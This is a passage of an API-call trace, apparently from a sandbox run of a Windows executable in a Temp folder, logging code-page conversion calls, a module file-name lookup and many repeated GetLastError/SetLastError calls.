\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䶳氀ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0112.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x67\x6e\x7e\x6e\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0112.058] GetLastError () returned 0x6 [0112.058] SetLastError (dwErrCode=0x6) [0112.058] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.058] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䶳氀ശAĀ") returned 256 [0112.058] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䶳氀ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0112.058] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䶳氀ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0112.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x67\x6e\x7e\x6e\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0112.058] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 